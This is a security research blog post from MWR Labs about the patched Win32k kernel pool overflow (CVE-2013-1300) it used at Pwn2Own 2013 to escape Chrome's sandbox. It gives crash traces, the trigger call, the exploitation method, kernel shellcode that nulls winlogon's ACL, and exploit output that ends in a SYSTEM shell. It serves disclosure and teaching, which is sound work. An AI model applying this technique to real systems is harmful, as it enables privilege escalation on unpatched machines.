MWR Labs took part in Pwn2Own 2013, demonstrating a full sandbox escape against Google Chrome. Two exploits were used in the demonstration:

  • A type confusion in WebKit, Chrome’s rendering engine (CVE-2013-0912). We blogged about this vulnerability previously.
  • A kernel pool overflow in Win32k which allowed us to break out of the sandbox by compromising the underlying operating system (CVE-2013-1300).

This blog post discusses the details of the kernel vulnerability and exploit. The specific vulnerability was fixed by Microsoft in MS13-053.

The details of this vulnerability were first presented at the Nordic Sec Conf in Iceland (see our review of the conference). The slides of our presentation can be downloaded here.

Fuzzing the Windows Kernel

The specific vulnerability was found using MWR Labs’ Windows Kernel fuzzer. The fuzzer produced several crashes, a number of which shared the following signature:

nt!ExpReleasePoolQuota+0x21:
82aca424 8a07 mov al,byte ptr [edi] ds:0023:00410041=??
00000008 ffb80530 00000000 nt!ExpReleasePoolQuota+0x21
fd6b7168 00000000 ffb80530 nt!ExFreePoolWithTag+0x779
ffb80530 00000000 2ba8aa2a win32k!UnlinkSendListSms+0x70
00243c78 0000000d 00000008 win32k!xxxInterSendMsgEx+0xd0a
fe243c78 0000000d 00000008 win32k!xxxSendMessageTimeout+0x13b
fe243c78 0000000d 00000008 win32k!xxxSendMessageEx+0xec
fe243c78 0000000d 00000008 win32k!NtUserfnOUTSTRING+0xa7
0001037c 0000000d 00000008 win32k!NtUserMessageCall+0xc9
0001037c 0000000d 00000008 nt!KiFastCallEntry+0x12a

These crashes caught our attention as they indicated that pool memory had been corrupted. Looking at the crash dumps, we observed that the following undocumented system call triggered the crash:

NtUserMessageCall(
    HWND,
    WM_GETTEXT,
    0x8,        // Buffer size
    ptr,        // user mode buffer
    0x0,
    0x2b3,
    0x2);       // ASCII boolean/flag

A few more requirements had to be satisfied in order to trigger the bug:

  1. The message had to be sent between separate threads or processes.
  2. The receiving window had to be an ASCII window (created with CreateWindowExA).
  3. The receiving window procedure had to send a reply to the WM_GETTEXT message that is larger than the buffer size divided by two.
  4. The last argument of NtUserMessageCall had to be an even number greater than 0.

The last requirement was particularly interesting. We’ll see why a little later in this blog post.

The Vulnerability

When sending messages between threads in Windows, the xxxInterSendMsgEx function is responsible for forwarding the messages from the sending thread to the receiving thread. For certain message types that require a buffer to be returned (such as a string), it calculates the required buffer size and allocates the buffer with a call to Win32AllocPoolWithQuota. Two factors are taken into account in order to determine the buffer size:

  • The type of the message.
  • The arguments to the system call responsible for sending the message. Of particular interest for responses returning strings is whether the caller expects an ASCII or WCHAR value.

The allocated buffer is then filled in by the receiving window while it is polling for outstanding messages. For our specific message, the kernel stack will look as follows:

a9de17d0 825c4759 a9de1850 a9dd9a84 00000008 win32k!CopyOutputString
a9de1aa4 82625d85 fe2389a0 0000000d 00000008 win32k!SfnOUTSTRING+0x336
a9de1aec 825f5ad1 0a2389a0 0000000d 00000008 win32k!xxxSendMessageToClient+0x175
a9de1b68 82638034 fd96c5a0 2bad6b5a 0171fed8 win32k!xxxReceiveMessage+0x3b8
a9de1bb8 8263b7e6 a9de1be8 000025ff 00000000 win32k!xxxRealInternalGetMessage+0x252
a9de1c1c 82a4e89a 0171fed8 00000000 00000000 win32k!NtUserGetMessage+0x3f
a9de1c1c 77677094 0171fed8 00000000 00000000 nt!KiFastCallEntry+0x12a
0171ff00 7769377b 00000000 76fed4be 00000000 ntdll!KiFastSystemCallRet
0171ff40 7769374e 013d1340 00000000 00000000 ntdll!__RtlUserThreadStart+0x70
0171ff58 00000000 013d1340 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b

CopyOutputString will fill in the kernel buffer, converting the value returned from the window procedure where applicable. The appropriate conversion is determined from the type of the receiving window (whether the window is ASCII or WCHAR) and the last argument passed to NtUserMessageCall (indicating if it is an ASCII or WCHAR message). This results in four potential cases:

  1. Both ASCII: Use strncpycch to copy the data.
  2. Both WCHAR: Use wcsncpycch to copy the data.
  3. ASCII target window and WCHAR requested by system call: Convert the string using MBToWCSEx.
  4. WCHAR target window and ASCII requested by system call: Convert the string using WCSToMBEx.

It should be obvious that the action that is taken must always match the size of the buffer that was previously allocated in xxxInterSendMsgEx. However, prior to the release of the patches in MS13-053, this was not the case.

The problem was a discrepancy in how the allocation function and the function performing the copy operation interpreted the last argument to NtUserMessageCall. The allocation function treated the argument as a Boolean value: 0 was considered false and indicated a WCHAR value, while anything else was interpreted as true and indicated an ASCII value. The function performing the copy operation, however, interpreted the argument as a bit flag, examining only the least significant bit to decide whether the value should be treated as ASCII or WCHAR.

In cases where the last argument to NtUserMessageCall is an even number and is non-zero, the allocation function and the function performing the copy operation will interpret this value differently. As an example, if we passed the value 2 as the last argument, the allocation function would treat this as Boolean true, and allocate a buffer big enough to hold the ASCII representation of the string. When the function performing the copy operation is called, it would copy the string as a WCHAR value, because the least significant bit of the value 2 is not set.
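The mismatch can be reproduced in a few lines of C. This is only a sketch of the two interpretations described above, not the actual win32k code; all function names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Allocation side, as described above: any non-zero value means ASCII. */
static bool alloc_sees_ascii(uint32_t flag)
{
    return flag != 0;
}

/* Copy side, as described above: only the least significant bit is tested. */
static bool copy_sees_ascii(uint32_t flag)
{
    return (flag & 1u) != 0;
}

/* True when the two sides disagree, i.e. the buffer is sized for ASCII
 * but the copy writes WCHARs. */
static bool interpretations_disagree(uint32_t flag)
{
    return alloc_sees_ascii(flag) != copy_sees_ascii(flag);
}
```

Under this model, the values 0, 1 and 3 are handled consistently, while 2 (or any other non-zero even number) makes the two sides disagree.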

The allocated buffer will always be freed later in the xxxInterSendMsgEx function, and in most cases a crash will be triggered if the memory adjacent to the buffer was corrupted.

The Exploit

The buffer that we are able to overflow was allocated using the Win32AllocPoolWithQuota function, which stores a pointer to the relevant EPROCESS structure in order to track allocations for the current process. On our target platform (Windows 7 32-bit) this results in the following buffer layout, with the EPROCESS pointer conveniently placed after our data:

[Figure: buffer layout]

Tarjei Mandt’s Kernel Pool Exploitation on Windows 7 paper gave us a few pointers on how to exploit this issue.

The block size for the pool allocation (including the EPROCESS pointer) is derived from the buffer size we specify through the third argument to NtUserMessageCall, and is rounded up to the nearest 16-byte boundary. The write to the buffer can be at most twice the requested size, because the WCHAR representation of a string is twice the length of its ASCII representation. Ideally, to preserve reliability, we want to overwrite the EPROCESS pointer without corrupting any adjacent memory. To achieve this, we chose a buffer size of 8, which results in an allocation of 12 bytes (8 plus the size of the EPROCESS pointer) that is rounded up to 16. The copy operation writes double the size of the buffer we requested, which in this case is also 16 bytes. This ensures that we corrupt the EPROCESS pointer without affecting any adjacent pool objects.
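The arithmetic behind that choice can be checked with a small model. It is a simplified sketch that assumes a 4-byte EPROCESS pointer and the 16-byte rounding stated above, and it ignores the pool header; the function and constant names are hypothetical.

```c
#include <stddef.h>

enum {
    QUOTA_POINTER_SIZE = 4,   /* EPROCESS pointer on 32-bit Windows 7 */
    POOL_GRANULARITY   = 16   /* rounding stated in the text above */
};

/* Size of the pool block backing a buffer of `requested` bytes. */
static size_t block_size(size_t requested)
{
    size_t needed = requested + QUOTA_POINTER_SIZE;
    return (needed + POOL_GRANULARITY - 1) / POOL_GRANULARITY * POOL_GRANULARITY;
}

/* Bytes written when the string is copied as WCHARs instead of ASCII. */
static size_t bytes_written(size_t requested)
{
    return requested * 2;
}

/* Bytes that spill past the end of the block into adjacent pool memory. */
static size_t bytes_past_block(size_t requested)
{
    size_t written = bytes_written(requested);
    size_t block = block_size(requested);
    return written > block ? written - block : 0;
}
```

For a request of 8 bytes the model gives a 16-byte block and a 16-byte write, so nothing spills into the next pool object. A request of 24 bytes, by contrast, would give a 32-byte block and a 48-byte write, spilling 16 bytes.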

Because the conversion is from ASCII (not UTF-8) to WCHAR, we were only able to overwrite the pointer with a limited set of values of the form 0x00xx00yy, where xx and yy are arbitrary values we control. After the copy operation, the buffer layout would be as follows:

[Figure: buffer layout after the copy operation]
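The 0x00xx00yy constraint follows directly from the widening. As a rough sketch, assuming each single-byte character is simply zero-extended to a 16-bit WCHAR and the result is read back as a little-endian 32-bit pointer (the helper names are hypothetical):

```c
#include <stdbool.h>
#include <stdint.h>

/* Value read back as a little-endian 32-bit pointer after two single-byte
 * characters have each been zero-extended to a 16-bit WCHAR. */
static uint32_t widened_pointer(uint8_t first, uint8_t second)
{
    return (uint32_t)first | ((uint32_t)second << 16);
}

/* An address can be produced this way only if bytes 1 and 3 are zero. */
static bool is_reachable(uint32_t address)
{
    return (address & 0xFF00FF00u) == 0;
}
```

Two 'A' characters (0x41) give 0x00410041, which is the address dereferenced in the crash signature shown earlier. A typical kernel address such as 0xFE230508 cannot be produced this way, which is why the overwritten pointer has to land in user mode memory.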

This allowed us to point the EPROCESS pointer into user mode memory, and fake this structure at an address we control. The EPROCESS structure contains a lot of fields, many of which are uninteresting for the purposes of exploitation. However, when our buffer is freed, several values that are referenced through the EPROCESS pointer are modified. Specifically, the QuotaBlock pointer in the EPROCESS structure is used to locate the quota block for that process, as shown below:

kd> dt ntkrpamp!_EPROCESS
...
+0x0d4 QuotaBlock : Ptr32 _EPROCESS_QUOTA_BLOCK
...

As we control this value, we are also able to direct the pointer to the EPROCESS_QUOTA_BLOCK into controlled user memory. The EPROCESS_QUOTA_BLOCK is defined as follows:

typedef struct _EPROCESS_QUOTA_BLOCK {
    EPROCESS_QUOTA_ENTRY QuotaEntry[3];
    LIST_ENTRY QuotaList;
    ULONG ReferenceCount;
    ULONG ProcessCount;
} EPROCESS_QUOTA_BLOCK, *PEPROCESS_QUOTA_BLOCK;

Amongst other things, the ReferenceCount value will be decremented on a free of a buffer. It is important to remember that although we are operating on memory allocated in user mode, the decrementing of values during a free will be performed in the context of kernel mode, so we are able to decrement any value, including those in kernel memory. We are also able to trigger this decrement an arbitrary number of times, allowing us more flexibility.
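The resulting primitive can be modelled in user mode. The sketch below is an illustration only: REFCOUNT_OFFSET is a hypothetical placeholder (the real offset depends on the size of EPROCESS_QUOTA_ENTRY, which is not shown here), and simulated_free stands in for the part of the free path that decrements ReferenceCount.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical offset of ReferenceCount inside the quota block; the real
 * value depends on the size of EPROCESS_QUOTA_ENTRY, which is not shown. */
enum { REFCOUNT_OFFSET = 0x40 };

/* Where the fake quota block must start so that its ReferenceCount
 * field lands exactly on `target`. */
static uint8_t *quota_block_for_target(uint8_t *target)
{
    return target - REFCOUNT_OFFSET;
}

/* Stand-in for the part of the free path that decrements ReferenceCount. */
static void simulated_free(uint8_t *quota_block)
{
    uint32_t count;
    memcpy(&count, quota_block + REFCOUNT_OFFSET, sizeof count);
    count--;
    memcpy(quota_block + REFCOUNT_OFFSET, &count, sizeof count);
}
```

Pointing the fake QuotaBlock at quota_block_for_target(address) turns every free into a decrement of the 32-bit value at that address, and repeating the free repeats the decrement.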

So, what can we find in kernel mode that will result in reliable code execution when decremented one or more times?

A known trick to retrieve pointers to kernel mode objects from user mode in Windows (prior to Windows 8) is to use the gSharedInfo table in user32.dll, which is at a static address and is mapped into all processes on the system. For the exploit, we can create a new win32k window object and retrieve the kernel mode address using this trick. Once we know this value, we can search for a value to decrement within this object’s structure. We decided to decrement the state value, which is a bit mask, and is outlined below:

kd> dt win32k!tagWND
+0x000 head : _THRDESKHEAD
+0x014 state : Uint4B
+0x014 bHasMeun : Pos 0, 1 Bit
...
+0x014 bServerSideWindowProc : Pos 18, 1 Bit
+0x014 bAnsiWindowProc : Pos 19, 1 Bit
+0x014 bBeingActivated : Pos 20, 1 Bit
...
+0x014 bMaximizesToMonitor : Pos 30, 1 Bit
+0x014 bDestroyed : Pos 31, 1 Bit
...
+0x060 lpfnWndProc : Ptr32 long
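The handle lookup that yields the kernel address of the window object can be sketched as follows. The entry layout is an assumption taken from public research on 32-bit Windows 7 rather than from this post, and the struct, field and function names are hypothetical.

```c
#include <stdint.h>

/* Assumed 32-bit handle entry layout (from public research, not from this
 * post): object pointer, owner pointer, type, flags, uniqueness counter. */
struct handle_entry32 {
    uint32_t phead;    /* kernel address of the object */
    uint32_t owner;
    uint8_t  type;
    uint8_t  flags;
    uint16_t uniq;
};

/* The low 16 bits of a user handle index the table. */
static uint32_t handle_index(uint32_t handle)
{
    return handle & 0xFFFFu;
}

/* Kernel address of the object that `handle` refers to. */
static uint32_t kernel_address_of(const struct handle_entry32 *table,
                                  uint32_t handle)
{
    return table[handle_index(handle)].phead;
}
```

With the handle 0x0002028A from the exploit output further down, handle_index returns 0x028A, matching the index the exploit reports.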

Interestingly, one of the flags in this bit mask is the bServerSideWindowProc flag. This flag indicates whether the window procedure associated with the current window should be executed in user mode or in kernel mode. If this flag is set to 1, the window procedure (which we define during window creation) will be executed without a context switch, and consequently will run in kernel mode. In order to ensure we have decremented the value enough to set this flag, our window procedure checks whether it is being run in kernel mode on entry:

WORD um = 0;
__asm {
    mov ax, cs      // read the current code segment selector
    mov um, ax
}
if (um == 0x1b) {
    // USER MODE
} else {
    // KERNEL MODE CODE EXECUTION
}
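The comparison against 0x1b works because the low two bits of an x86 segment selector encode the privilege level. A slightly more general form of the same test, written as portable C for illustration (the helper names are hypothetical, and 0x08 as the kernel mode code selector on 32-bit Windows is stated here as an assumption):

```c
#include <stdbool.h>
#include <stdint.h>

/* The low two bits of a segment selector hold the privilege level:
 * 0 is kernel mode (ring 0), 3 is user mode (ring 3). */
static unsigned privilege_level(uint16_t selector)
{
    return selector & 3u;
}

/* True when the code segment selector belongs to ring 0. */
static bool is_kernel_mode(uint16_t cs)
{
    return privilege_level(cs) == 0;
}
```

The user mode selector 0x1b yields privilege level 3, so is_kernel_mode(0x1b) is false, while a ring 0 selector such as 0x08 yields level 0.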

If the window procedure is executed in user mode, we bail and trigger an additional decrement. If it is executed in kernel mode, it runs our shellcode, which allows us to elevate privileges from user mode. To achieve this, we decided to implement a neat trick detailed in Easy local Windows Kernel exploitation by Cesar Cerrudo. The trick involves nulling out the ACL of a SYSTEM process so that we are able to inject a thread into the privileged process from a less privileged process (in this case, the Chrome renderer process, which runs under the “untrusted” integrity level). The kernel mode shellcode retrieves the KPROCESS structure from the window object and then iterates over the KPROCESS linked list until it finds the process to remove the ACL from:

mov eax, hwnd      // WND
mov eax, [eax+8]   // THREADINFO
mov eax, [eax]     // ETHREAD
mov eax, [eax+0x150] // KPROCESS
mov eax, [eax+0xb8]  // flink
procloop:
lea edx, [eax-0xb8]  // KPROCESS
mov eax, [eax]
add edx, 0x16c       // module name
cmp dword ptr [edx], 0x6c6e6977 // "winl" for winlogon.exe
jne procloop
sub edx, 0x170
mov dword ptr [edx], 0x0  // NULL ACL
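For readers less used to assembly, the same list walk can be expressed in C against mock structures. This is a user mode illustration only: the struct layout and all names are hypothetical, and, unlike the shellcode, the loop gives up after one full lap instead of spinning forever.

```c
#include <stddef.h>
#include <stdint.h>

struct list_entry { struct list_entry *flink, *blink; };

/* Mock process record; field names and layout are illustrative only. */
struct mock_process {
    void *security;              /* stand-in for the value the shellcode nulls */
    struct list_entry links;     /* stand-in for the process list links */
    char image_name[16];
};

/* Pack the first four name bytes the way a little-endian dword load would. */
static uint32_t name_tag(const char *name)
{
    const unsigned char *n = (const unsigned char *)name;
    return (uint32_t)n[0] | (uint32_t)n[1] << 8 |
           (uint32_t)n[2] << 16 | (uint32_t)n[3] << 24;
}

/* Recover the record from a pointer to its embedded list links. */
static struct mock_process *from_links(struct list_entry *e)
{
    return (struct mock_process *)((char *)e - offsetof(struct mock_process, links));
}

/* Follow flink from `self` until a name matches; NULL after a full lap. */
static struct mock_process *find_process(struct mock_process *self, uint32_t tag)
{
    for (struct list_entry *e = self->links.flink; e != &self->links; e = e->flink) {
        struct mock_process *p = from_links(e);
        if (name_tag(p->image_name) == tag)
            return p;
    }
    return NULL;
}

/* Mirror of the final shellcode step: clear the security field. */
static void clear_security(struct mock_process *p)
{
    p->security = NULL;
}
```

name_tag("winlogon.exe") evaluates to 0x6c6e6977, the constant compared against in the shellcode, so find_process(self, 0x6c6e6977) followed by clear_security mirrors the two steps of the assembly.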

In our exploit, we used winlogon.exe, as it has SYSTEM privileges and runs on the default desktop. This was necessary to ensure that the SYSTEM-level calc.exe would be visible for all to see. :)

When run on an unpatched 32-bit Windows 7 machine, our exploit shows the following output:

.mMMMMMm.    mMMm    M   WWW W     W   RRRRR
mMMMMMMMMMMM. MM MM   W     W     W   R   R
/MMMM- -MM.   MM MM   W     W     W   R   R
/MMM. _ \/ ^  M  M  M  W   W W   W   RRRR
|M. aRRr /W|  M  M  M  W   W W   W   R   R
\/ .. ^^^ wWWW| M  M  M   W W   W    R   R
/WW\. .wWWWW/  M  M  M   W W   W    R   R
|WWWWWWWWWWW/
.WWWWWW.

[+] This is schlamperei
[-] kernel class registered: 00001338
[-] kernel proc called from usermode. msg: 0x0024, wparam: 0x00000000, lparam: 0x001bf310
[-] kernel proc called from usermode. msg: 0x0081, wparam: 0x00000000, lparam: 0x001bf308
[-] kernel proc called from usermode. msg: 0x0083, wparam: 0x00000000, lparam: 0x001bf330
[-] kernel proc called from usermode. msg: 0x0001, wparam: 0x00000000, lparam: 0x001bf2fc
[-] kernel window created: 0002028A
[-] user32 is at 76F40000
[-] sharedinfo is at 76FA9440
[-] ahelist is at 003F0000
[-] index of for HANDLE 0002028a is 028a
[-] address of user object is FE230508
[-] resolved NtAllocateVirtualMemory at 0x776752D8
[-] trying to find suitable address for EPROCESS structure
[-] failed to allocate page at 0x200000. Trying next page
[-] failed to allocate page at 0x210000. Trying next page
[-] failed to allocate page at 0x220000. Trying next page
[+] successfully allocated page at 0x230000
[-] creating window thread
[-] sleeping for window thread to be created
[-] window thread started
[-] ansi class registered: 00001337
[-] ansi window created: 000702AA
[-] triggering the vulnerability multiple times
[-] triggering our now kernel mode wndproc
[+] Success \o/ winlogon pid=1128
[-] handle to winlogon: 0x005c
[-] allocated executable page in winlogon @ 0x9f0000
[-] copying and executing shellcode
[+] enjoy your SYSTEM shell

We will release the full exploit code in a few weeks. Until then, we leave it as an exercise for the interested reader to implement an exploit for the vulnerability.

Conclusion

The kernel is one of the main weaknesses in modern sandbox implementations. Windows 8 and 8.1 have introduced additional features and protections which would prevent our exploit from working on these platforms. We are looking forward to Pwn2Own 2014 to see how successful these protections are in preventing sandbox escapes.